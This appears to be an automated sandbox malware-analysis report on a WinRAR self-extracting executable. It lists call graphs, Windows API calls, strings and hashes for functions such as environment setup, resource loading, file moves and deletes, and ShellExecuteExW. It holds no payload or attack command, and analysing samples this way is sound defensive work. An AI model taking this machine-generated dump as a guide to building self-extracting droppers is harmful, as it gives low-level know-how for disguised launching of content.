GetCurrentProcessId AttachConsole 25063->25065 25066 fc0df3 ExitProcess 25063->25066 25067 fc081b 2 API calls 25064->25067 25135 fd3e13 25065->25135 25069 fc0d21 25067->25069 25071 fbe617 53 API calls 25069->25071 25070 fc0dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 25070->25066 25072 fc0d3c 25071->25072 25073 fb4092 _swprintf 51 API calls 25072->25073 25074 fc0d4f 25073->25074 25075 fbe617 53 API calls 25074->25075 25076 fc0d5e 25075->25076 25076->25066 25077->24877 25079 fc081b 2 API calls 25078->25079 25080 fcac2a OleInitialize 25079->25080 25081 fcac4d GdiplusStartup SHGetMalloc 25080->25081 25081->24879 25085 fcc5ce 25082->25085 25083 fcc6e4 25083->24888 25083->24889 25084 fc1fac CharUpperW 25084->25085 25085->25083 25085->25084 25137 fbf3fa 82 API calls 2 library calls 25085->25137 25088 fcec50 25087->25088 25089 fcdbeb SetEnvironmentVariableW 25088->25089 25091 fcdc0e 25089->25091 25090 fcdc36 25090->24882 25091->25090 25092 fcdc2a SetEnvironmentVariableW 25091->25092 25092->25090 25094 fcb6fe 25093->25094 25095 fcb70b GetObjectW 25093->25095 25138 fca6c2 FindResourceW 25094->25138 25097 fcb71a 25095->25097 25098 fca5c6 4 API calls 25097->25098 25101 fcb72d 25098->25101 25100 fcb770 25112 fbda42 25100->25112 25101->25100 25102 fcb74c 25101->25102 25103 fca6c2 12 API calls 25101->25103 25152 fca605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25102->25152 25105 fcb73d 25103->25105 25105->25102 25107 fcb743 DeleteObject 25105->25107 25106 fcb754 25153 fca5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25106->25153 25107->25102 25109 fcb75d 25154 fca80c 8 API calls 25109->25154 25111 fcb764 DeleteObject 25111->25100 25163 fbda67 25112->25163 25117 fc90b7 25118 fceb38 8 API calls 25117->25118 25119 fc90d6 25118->25119 25119->24901 25121 fcacab GdiplusShutdown OleUninitialize 25120->25121 25121->24917 25123->24908 25124->24916 25126 fbb15a GetVersionExW 25125->25126 25127 fbb196 25125->25127 25126->25127 25127->25045 25129 fcec50 25128->25129 25130 fc0828 GetSystemDirectoryW 25129->25130 25131 fc085e 25130->25131 25132 fc0840 25130->25132 25131->25045 25133 fc0851 LoadLibraryW 25132->25133 25133->25131 25134->25039 25136 fd3e1b 25135->25136 25136->25070 25136->25136 25137->25085 25139 fca7d3 25138->25139 25140 fca6e5 SizeofResource 25138->25140 25139->25095 25139->25097 25140->25139 25141 fca6fc LoadResource 25140->25141 25141->25139 25142 fca711 LockResource 25141->25142 25142->25139 25143 fca722 GlobalAlloc 25142->25143 25143->25139 25144 fca73d GlobalLock 25143->25144 25145 fca7cc GlobalFree 25144->25145 25146 fca74c __InternalCxxFrameHandler 25144->25146 25145->25139 25147 fca7c5 GlobalUnlock 25146->25147 25155 fca626 GdipAlloc 25146->25155 25147->25145 25150 fca79a GdipCreateHBITMAPFromBitmap 25151 fca7b0 25150->25151 25151->25147 25152->25106 25153->25109 25154->25111 25156 fca638 25155->25156 25157 fca645 25155->25157 25159 fca3b9 25156->25159 25157->25147 25157->25150 25157->25151 25160 fca3da GdipCreateBitmapFromStreamICM 25159->25160 25161 fca3e1 GdipCreateBitmapFromStream 25159->25161 25162 fca3e6 25160->25162 25161->25162 25162->25157 25164 fbda75 __EH_prolog 25163->25164 25165 fbdaa4 GetModuleFileNameW 25164->25165 25166 fbdad5 25164->25166 25167 fbdabe 25165->25167 25209 fb98e0 25166->25209 25167->25166 25169 fbdb31 25220 fd6310 25169->25220 25170 fb959a 80 API calls 25171 fbda4e 25170->25171 25207 fbe29e GetModuleHandleW FindResourceW 25171->25207 25173 fbdb05 25173->25169 25175 fbe261 78 API calls 25173->25175 25200 fbdd4a 25173->25200 25174 fbdb44 25176 fd6310 26 API calls 25174->25176 25175->25173 25185 fbdb56 ___vcrt_FlsFree 25176->25185 25177 fbdc85 25177->25200 25240 fb9d70 81 API calls 25177->25240 25179 fb9e80 79 API calls 25179->25185 25181 fbdc9f ___std_exception_copy 25182 fb9bd0 82 API calls 25181->25182 25181->25200 25183 fbdcc8 ___std_exception_copy 25182->25183 25183->25200 25204 fbdcd3 _wcslen ___std_exception_copy ___vcrt_FlsFree 25183->25204 25241 fc1b84 MultiByteToWideChar 25183->25241 25185->25177 25185->25179 25185->25200 25234 fb9bd0 25185->25234 25239 fb9d70 81 API calls 25185->25239 25187 fbe159 25193 fbe1de 25187->25193 25247 fd8cce 26 API calls 2 library calls 25187->25247 25190 fbe16e 25248 fd7625 26 API calls 2 library calls 25190->25248 25192 fbe1c6 25249 fbe27c 78 API calls 25192->25249 25194 fbe214 25193->25194 25196 fbe261 78 API calls 25193->25196 25197 fd6310 26 API calls 25194->25197 25196->25193 25198 fbe22d 25197->25198 25199 fd6310 26 API calls 25198->25199 25199->25200 25200->25170 25202 fc1da7 WideCharToMultiByte 25202->25204 25204->25187 25204->25200 25204->25202 25242 fbe5b1 50 API calls __vsnprintf 25204->25242 25243 fd6159 26 API calls 3 library calls 25204->25243 25244 fd8cce 26 API calls 2 library calls 25204->25244 25245 fd7625 26 API calls 2 library calls 25204->25245 25246 fbe27c 78 API calls 25204->25246 25208 fbda55 25207->25208 25208->25117 25210 fb98ea 25209->25210 25211 fb994b CreateFileW 25210->25211 25212 fb99bb 25211->25212 25213 fb996c GetLastError 25211->25213 25217 fb99ff 25212->25217 25219 fb99e5 SetFileTime 25212->25219 25214 fbbb03 GetCurrentDirectoryW 25213->25214 25215 fb998c 25214->25215 25215->25212 25216 fb9990 CreateFileW GetLastError 25215->25216 25216->25212 25218 fb99b5 25216->25218 25217->25173 25218->25212 25219->25217 25221 fd6349 25220->25221 25222 fd634d 25221->25222 25233 fd6375 25221->25233 25250 fd91a8 20 API calls __dosmaperr 25222->25250 25224 fd6352 25251 fd9087 26 API calls __cftof 25224->25251 25225 fd6699 25227 fcfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25225->25227 25229 fd66a6 25227->25229 25228 fd635d 25230 fcfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25228->25230 25229->25174 25231 fd6369 25230->25231 25231->25174 25233->25225 25252 fd6230 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25233->25252 25235 fb9bdc 25234->25235 25236 fb9be3 25234->25236 25235->25185 25236->25235 25238 fb9785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25236->25238 25253 fb6d1a 77 API calls 25236->25253 25238->25236 25239->25185 25240->25181 25241->25204 25242->25204 25243->25204 25244->25204 25245->25204 25246->25204 25247->25190 25248->25192 25249->25193 25250->25224 25251->25228 25252->25233 25253->25236 25255 fd7ce1 _unexpected 25254->25255 25256 fd7ce8 25255->25256 25257 fd7cfa 25255->25257 25290 fd7e2f GetModuleHandleW 25256->25290 25278 fdac31 EnterCriticalSection 25257->25278 25260 fd7ced 25260->25257 25291 fd7e73 GetModuleHandleExW 25260->25291 25261 fd7d9f 25279 fd7ddf 25261->25279 25265 fd7d76 25270 fd7d8e 25265->25270 25275 fd8a91 _abort 5 API calls 25265->25275 25267 fd7d01 25267->25261 25267->25265 25299 fd87e0 20 API calls _abort 25267->25299 25268 fd7dbc 25282 fd7dee 25268->25282 25269 fd7de8 25300 fe2390 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25269->25300 25271 fd8a91 _abort 5 API calls 25270->25271 25271->25261 25275->25270 25278->25267 25301 fdac81 LeaveCriticalSection 25279->25301 25281 fd7db8 25281->25268 25281->25269 25302 fdb076 25282->25302 25285 fd7e1c 25288 fd7e73 _abort 8 API calls 25285->25288 25286 fd7dfc GetPEB 25286->25285 25287 fd7e0c GetCurrentProcess TerminateProcess 25286->25287 25287->25285 25289 fd7e24 ExitProcess 25288->25289 25290->25260 25292 fd7e9d GetProcAddress 25291->25292 25293 fd7ec0 25291->25293 25297 fd7eb2 25292->25297 25294 fd7ecf 25293->25294 25295 fd7ec6 FreeLibrary 25293->25295 25296 fcfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25294->25296 25295->25294 25298 fd7cf9 25296->25298 25297->25293 25298->25257 25299->25265 25301->25281 25303 fdb09b 25302->25303 25307 fdb091 25302->25307 25304 fdac98 __dosmaperr 5 API calls 25303->25304 25304->25307 25305 fcfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25306 fd7df8 25305->25306 25306->25285 25306->25286 25307->25305 25413 fb6faa 111 API calls 3 library calls 25373 fceda7 48 API calls _unexpected 25414 fcf3a0 27 API calls 25338 fda4a0 71 API calls _free 25339 fcdca1 DialogBoxParamW 25340 fe08a0 IsProcessorFeaturePresent 25341 fdb49d 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25374 fcb18d 74 API calls 25343 fcc793 97 API calls 4 library calls 25396 fcc793 102 API calls 4 library calls 25376 fc9580 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 23384 fb9f7a 23385 fb9f88 23384->23385 23386 fb9f8f 23384->23386 23387 fb9f9c GetStdHandle 23386->23387 23394 fb9fab 23386->23394 23387->23394 23388 fba003 WriteFile 23388->23394 23389 fb9fcf 23390 fb9fd4 WriteFile 23389->23390 23389->23394 23390->23389 23390->23394 23392 fba095 23396 fb6e98 77 API calls 23392->23396 23394->23385 23394->23388 23394->23389 23394->23390 23394->23392 23395 fb6baa 78 API calls 23394->23395 23395->23394 23396->23385 25416 fb1f72 128 API calls __EH_prolog 25346 fca070 10 API calls 25397 fcb270 99 API calls 25348 fb1075 84 API calls 23452 fb9a74 23455 fb9a7e 23452->23455 23453 fb9b9d SetFilePointer 23454 fb9bb6 GetLastError 23453->23454 23458 fb9ab1 23453->23458 23454->23458 23455->23453 23457 fb9b79 23455->23457 23455->23458 23459 fb981a 23455->23459 23457->23453 23460 fb9833 23459->23460 23463 fb9e80 23460->23463 23464 fb9e92 23463->23464 23468 fb9ea5 23463->23468 23467 fb9865 23464->23467 23472 fb6d5b 77 API calls 23464->23472 23466 fb9eb8 SetFilePointer 23466->23467 23469 fb9ed4 GetLastError 23466->23469 23467->23457 23468->23466 23468->23467 23469->23467 23470 fb9ede 23469->23470 23470->23467 23473 fb6d5b 77 API calls 23470->23473 23472->23468 23473->23467 25418 fd7f6e 52 API calls 2 library calls 23477 fce569 23478 fce517 23477->23478 23478->23477 23480 fce85d 23478->23480 23506 fce5bb 23480->23506 23482 fce86d 23483 fce8ee 23482->23483 23484 fce8ca 23482->23484 23487 fce966 LoadLibraryExA 23483->23487 23489 fce9c7 23483->23489 23494 fce9d9 23483->23494 23501 fcea95 23483->23501 23485 fce7fb DloadReleaseSectionWriteAccess 6 API calls 23484->23485 23486 fce8d5 RaiseException 23485->23486 23502 fceac3 23486->23502 23488 fce979 GetLastError 23487->23488 23487->23489 23490 fce98c 23488->23490 23491 fce9a2 23488->23491 23493 fce9d2 FreeLibrary 23489->23493 23489->23494 23490->23489 23490->23491 23495 fce7fb DloadReleaseSectionWriteAccess 6 API calls 23491->23495 23492 fcea37 GetProcAddress 23496 fcea47 GetLastError 23492->23496 23492->23501 23493->23494 23494->23492 23494->23501 23497 fce9ad RaiseException 23495->23497 23498 fcea5a 23496->23498 23497->23502 23500 fce7fb DloadReleaseSectionWriteAccess 6 API calls 23498->23500 23498->23501 23503 fcea7b RaiseException 23500->23503 23515 fce7fb 23501->23515 23502->23478 23504 fce5bb ___delayLoadHelper2@8 6 API calls 23503->23504 23505 fcea92 23504->23505 23505->23501 23507 fce5ed 23506->23507 23508 fce5c7 23506->23508 23507->23482 23523 fce664 23508->23523 23510 fce5cc 23511 fce5e8 23510->23511 23526 fce78d 23510->23526 23531 fce5ee GetModuleHandleW GetProcAddress GetProcAddress 23511->23531 23514 fce836 23514->23482 23516 fce80d 23515->23516 23517 fce82f 23515->23517 23518 fce664 DloadReleaseSectionWriteAccess 3 API calls 23516->23518 23517->23502 23519 fce812 23518->23519 23520 fce82a 23519->23520 23521 fce78d DloadProtectSection 3 API calls 23519->23521 23534 fce831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23520->23534 23521->23520 23532 fce5ee GetModuleHandleW GetProcAddress GetProcAddress 23523->23532 23525 fce669 23525->23510 23527 fce7a2 DloadProtectSection 23526->23527 23528 fce7dd VirtualProtect 23527->23528 23529 fce7a8 23527->23529 23533 fce6a3 VirtualQuery GetSystemInfo 23527->23533 23528->23529 23529->23511 23531->23514 23532->23525 23533->23528 23534->23517 25398 fd8268 55 API calls _free 25349 fcc793 107 API calls 4 library calls 24589 fccd58 24590 fcce22 24589->24590 24596 fccd7b 24589->24596 24600 fcc793 _wcslen _wcsrchr 24590->24600 24617 fcd78f 24590->24617 24591 fcb314 ExpandEnvironmentStringsW 24591->24600 24593 fcd40a 24595 fc1fbb CompareStringW 24595->24596 24596->24590 24596->24595 24597 fcca67 SetWindowTextW 24597->24600 24600->24591 24600->24593 24600->24597 24601 fd3e3e 22 API calls 24600->24601 24603 fcc855 SetFileAttributesW 24600->24603 24608 fccc31 GetDlgItem SetWindowTextW SendMessageW 24600->24608 24611 fccc71 SendMessageW 24600->24611 24616 fc1fbb CompareStringW 24600->24616 24641 fca64d GetCurrentDirectoryW 24600->24641 24643 fba5d1 6 API calls 24600->24643 24644 fba55a FindClose 24600->24644 24645 fcb48e 76 API calls 2 library calls 24600->24645 24601->24600 24605 fcc90f GetFileAttributesW 24603->24605 24615 fcc86f __cftof _wcslen 24603->24615 24605->24600 24607 fcc921 DeleteFileW 24605->24607 24607->24600 24609 fcc932 24607->24609 24608->24600 24610 fb4092 _swprintf 51 API calls 24609->24610 24612 fcc952 GetFileAttributesW 24610->24612 24611->24600 24612->24609 24613 fcc967 MoveFileW 24612->24613 24613->24600 24614 fcc97f MoveFileExW 24613->24614 24614->24600 24615->24600 24615->24605 24642 fbb991 51 API calls 2 library calls 24615->24642 24616->24600 24618 fcd799 __cftof _wcslen 24617->24618 24619 fcd9c0 24618->24619 24620 fcd8a5 24618->24620 24622 fcd9e7 24618->24622 24646 fc1fbb CompareStringW 24618->24646 24619->24622 24625 fcd9de ShowWindow 24619->24625 24621 fba231 3 API calls 24620->24621 24624 fcd8ba 24621->24624 24622->24600 24626 fcd8d9 ShellExecuteExW 24624->24626 24647 fbb6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 24624->24647 24625->24622 24626->24622 24633 fcd8ec 24626->24633 24628 fcd8d1 24628->24626 24629 fcd925 24648 fcdc3b 6 API calls 24629->24648 24630 fcd97b CloseHandle 24631 fcd994 24630->24631 24632 fcd989 24630->24632 24631->24619 24649 fc1fbb CompareStringW 24632->24649 24633->24629 24633->24630 24636 fcd91b ShowWindow 24633->24636 24636->24629 24637 fcd93d 24637->24630 24638 fcd950 GetExitCodeProcess 24637->24638 24638->24630 24639 fcd963 24638->24639 24639->24630 24641->24600 24642->24615 24643->24600 24644->24600 24645->24600 24646->24620 24647->24628 24648->24637 24649->24631 25350 fce455 14 API calls ___delayLoadHelper2@8 24654 fdc051 31 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25351 fca440 GdipCloneImage GdipAlloc 25400 fd3a40 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25420 fe1f40 CloseHandle 25381 fcf530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25421 fcff30 LocalFree 24693 fdbb30 24694 fdbb39 24693->24694 24695 fdbb42 24693->24695 24697 fdba27 24694->24697 24698 fd97e5 _unexpected 38 API calls 24697->24698 24699 fdba34 24698->24699 24717 fdbb4e 24699->24717 24701 fdba3c 24726 fdb7bb 24701->24726 24704 fd8e06 __vsnwprintf_l 21 API calls 24705 fdba64 24704->24705 24716 fdba96 24705->24716 24733 fdbbf0 24705->24733 24708 fd8dcc _free 20 API calls 24710 fdba53 24708->24710 24709 fdba91 24743 fd91a8 20 API calls __dosmaperr 24709->24743 24710->24695 24711 fdbaae 24713 fdbada 24711->24713 24714 fd8dcc _free 20 API calls 24711->24714 24713->24716 24744 fdb691 26 API calls 24713->24744 24714->24713 24716->24708 24718 fdbb5a ___scrt_is_nonwritable_in_current_image 24717->24718 24719 fd97e5 _unexpected 38 API calls 24718->24719 24721 fdbb64 24719->24721 24724 fdbbe8 _abort 24721->24724 24725 fd8dcc _free 20 API calls 24721->24725 24745 fd8d24 38 API calls _abort 24721->24745 24746 fdac31 EnterCriticalSection 24721->24746 24747 fdbbdf LeaveCriticalSection _abort 24721->24747 24724->24701 24725->24721 24727 fd4636 __fassign 38 API calls 24726->24727 24728 fdb7cd 24727->24728 24729 fdb7dc GetOEMCP 24728->24729 24730 fdb7ee 24728->24730 24731 fdb805 24729->24731 24730->24731 24732 fdb7f3 GetACP 24730->24732 24731->24704 24731->24710 24732->24731 24734 fdb7bb 40 API calls 24733->24734 24735 fdbc0f 24734->24735 24738 fdbc60 IsValidCodePage 24735->24738 24740 fdbc16 24735->24740 24742 fdbc85 __cftof 24735->24742 24736 fcfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24737 fdba89 24736->24737 24737->24709 24737->24711 24739 fdbc72 GetCPInfo 24738->24739 24738->24740 24739->24740 24739->24742 24740->24736 24748 fdb893 GetCPInfo 24742->24748 24743->24716 24744->24716 24746->24721 24747->24721 24749 fdb977 24748->24749 24753 fdb8cd 24748->24753 24752 fcfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24749->24752 24755 fdba23 24752->24755 24758 fdc988 24753->24758 24755->24740 24757 fdab78 __vsnwprintf_l 43 API calls 24757->24749 24759 fd4636 __fassign 38 API calls 24758->24759 24760 fdc9a8 MultiByteToWideChar 24759->24760 24762 fdca7e 24760->24762 24763 fdc9e6 24760->24763 24764 fcfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24762->24764 24765 fd8e06 __vsnwprintf_l 21 API calls 24763->24765 24769 fdca07 __cftof __vsnwprintf_l 24763->24769 24766 fdb92e 24764->24766 24765->24769 24772 fdab78 24766->24772 24767 fdca78 24777 fdabc3 20 API calls _free 24767->24777 24769->24767 24770 fdca4c MultiByteToWideChar 24769->24770 24770->24767 24771 fdca68 GetStringTypeW 24770->24771 24771->24767 24773 fd4636 __fassign 38 API calls 24772->24773 24774 fdab8b 24773->24774 24778 fda95b 24774->24778 24777->24762 24779 fda976 __vsnwprintf_l 24778->24779 24780 fda99c MultiByteToWideChar 24779->24780 24782 fda9c6 24780->24782 24792 fdab50 24780->24792 24781 fcfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24783 fdab63 24781->24783 24784 fda9e7 __vsnwprintf_l 24782->24784 24785 fd8e06 __vsnwprintf_l 21 API calls 24782->24785 24783->24757 24786 fdaa9c 24784->24786 24787 fdaa30 MultiByteToWideChar 24784->24787 24785->24784 24814 fdabc3 20 API calls _free 24786->24814 24787->24786 24788 fdaa49 24787->24788 24805 fdaf6c 24788->24805 24792->24781 24793 fdaaab 24797 fd8e06 __vsnwprintf_l 21 API calls 24793->24797 24800 fdaacc __vsnwprintf_l 24793->24800 24794 fdaa73 24794->24786 24795 fdaf6c __vsnwprintf_l 11 API calls 24794->24795 24795->24786 24796 fdab41 24813 fdabc3 20 API calls _free 24796->24813 24797->24800 24798 fdaf6c __vsnwprintf_l 11 API calls 24801 fdab20 24798->24801 24800->24796 24800->24798 24801->24796 24802 fdab2f WideCharToMultiByte 24801->24802 24802->24796 24803 fdab6f 24802->24803 24815 fdabc3 20 API calls _free 24803->24815 24806 fdac98 __dosmaperr 5 API calls 24805->24806 24807 fdaf93 24806->24807 24810 fdaf9c 24807->24810 24816 fdaff4 10 API calls 3 library calls 24807->24816 24809 fdafdc LCMapStringW 24809->24810 24811 fcfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24810->24811 24812 fdaa60 24811->24812 24812->24786 24812->24793 24812->24794 24813->24786 24814->24792 24815->24786 24816->24809 25354 fdc030 GetProcessHeap 25382 fdb4ae 27 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25356 fdf421 21 API calls __vsnwprintf_l 25401 fcc220 93 API calls _swprintf 25358 fb1025 29 API calls 25424 fb1710 86 API calls 25384 fcad10 73 API calls 25361 fca400 GdipDisposeImage GdipFree 25402 fcd600 70 API calls 25362 fd6000 QueryPerformanceFrequency QueryPerformanceCounter 25387 fd2900 6 API calls 4 library calls 25403 fdf200 51 API calls 25425 fda700 21 API calls

                                                          Executed Functions

                                                          Function 00FCDF1E Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 195filesleeptimeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 00FC0863: GetModuleHandleW.KERNEL32(kernel32), ref: 00FC087C
                                                            • Part of subcall function 00FC0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00FC088E
                                                            • Part of subcall function 00FC0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00FC08BF
                                                            • Part of subcall function 00FCA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00FCA655
                                                            • Part of subcall function 00FCAC16: OleInitialize.OLE32(00000000), ref: 00FCAC2F
                                                            • Part of subcall function 00FCAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00FCAC66
                                                            • Part of subcall function 00FCAC16: SHGetMalloc.SHELL32(00FF8438), ref: 00FCAC70
                                                          • GetCommandLineW.KERNEL32 ref: 00FCDF5C
                                                          • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00FCDF83
                                                          • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00FCDF94
                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 00FCDFCE
                                                            • Part of subcall function 00FCDBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00FCDBF4
                                                            • Part of subcall function 00FCDBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00FCDC30
                                                          • CloseHandle.KERNEL32(00000000), ref: 00FCDFD7
                                                          • GetModuleFileNameW.KERNEL32(00000000,0100EC90,00000800), ref: 00FCDFF2
                                                          • SetEnvironmentVariableW.KERNEL32(sfxname,0100EC90), ref: 00FCDFFE
                                                          • GetLocalTime.KERNEL32(?), ref: 00FCE009
                                                          • _swprintf.LIBCMT ref: 00FCE048
                                                          • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00FCE05A
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00FCE061
                                                          • LoadIconW.USER32(00000000,00000064), ref: 00FCE078
                                                          • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00FCE0C9
                                                          • Sleep.KERNEL32(?), ref: 00FCE0F7
                                                          • DeleteObject.GDI32 ref: 00FCE130
                                                          • DeleteObject.GDI32(?), ref: 00FCE140
                                                          • CloseHandle.KERNEL32 ref: 00FCE183
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                          • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                          • API String ID: 3049964643-3743209390
                                                          • Opcode ID: 17ff5b33371db8cd02b3eaef8a1a0e79742c166a08c97ea1233fef8bd1b94a04
                                                          • Instruction ID: 90b90b98fdf55b73a7dc3e425bab5aaf545d27eff166b1c2dbc3bf46df30fdc5
                                                          • Opcode Fuzzy Hash: 17ff5b33371db8cd02b3eaef8a1a0e79742c166a08c97ea1233fef8bd1b94a04
                                                          • Instruction Fuzzy Hash: A461F27190424AABD321AB71EE8EF3B37ACAF44754F04042DFA8596291DA7C9904F762
                                                          Function 00FCA6C2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100memorywindowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 812 fca6c2-fca6df FindResourceW 813 fca7db 812->813 814 fca6e5-fca6f6 SizeofResource 812->814 815 fca7dd-fca7e1 813->815 814->813 816 fca6fc-fca70b LoadResource 814->816 816->813 817 fca711-fca71c LockResource 816->817 817->813 818 fca722-fca737 GlobalAlloc 817->818 819 fca73d-fca746 GlobalLock 818->819 820 fca7d3-fca7d9 818->820 821 fca7cc-fca7cd GlobalFree 819->821 822 fca74c-fca76a call fd0320 819->822 820->815 821->820 826 fca76c-fca78e call fca626 822->826 827 fca7c5-fca7c6 GlobalUnlock 822->827 826->827 832 fca790-fca798 826->832 827->821 833 fca79a-fca7ae GdipCreateHBITMAPFromBitmap 832->833 834 fca7b3-fca7c1 832->834 833->834 835 fca7b0 833->835 834->827 835->834
                                                          APIs
                                                          • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00FCB73D,00000066), ref: 00FCA6D5
                                                          • SizeofResource.KERNEL32(00000000,?,?,?,00FCB73D,00000066), ref: 00FCA6EC
                                                          • LoadResource.KERNEL32(00000000,?,?,?,00FCB73D,00000066), ref: 00FCA703
                                                          • LockResource.KERNEL32(00000000,?,?,?,00FCB73D,00000066), ref: 00FCA712
                                                          • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00FCB73D,00000066), ref: 00FCA72D
                                                          • GlobalLock.KERNEL32(00000000,?,?,?,?,?,00FCB73D,00000066), ref: 00FCA73E
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00FCA7C6
                                                            • Part of subcall function 00FCA626: GdipAlloc.GDIPLUS(00000010), ref: 00FCA62C
                                                          • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00FCA7A7
                                                          • GlobalFree.KERNEL32(00000000), ref: 00FCA7CD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                                          • String ID: PNG
                                                          • API String ID: 541704414-364855578
                                                          • Opcode ID: 22d5339b3fb93ec46524bea8930ac93ae1c1fb2d7168b0c8350f8be7cee3781f
                                                          • Instruction ID: 4563a6068d7b481617ad1ddb2a3e6af4ccfa415945906f287017212f2ace29fd
                                                          • Opcode Fuzzy Hash: 22d5339b3fb93ec46524bea8930ac93ae1c1fb2d7168b0c8350f8be7cee3781f
                                                          • Instruction Fuzzy Hash: 16316D75A0034AABD7109F21ED8DE2B7BB9FF84764B04061DF90587621EB35E844FAA1
                                                          Function 00FBA69B Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
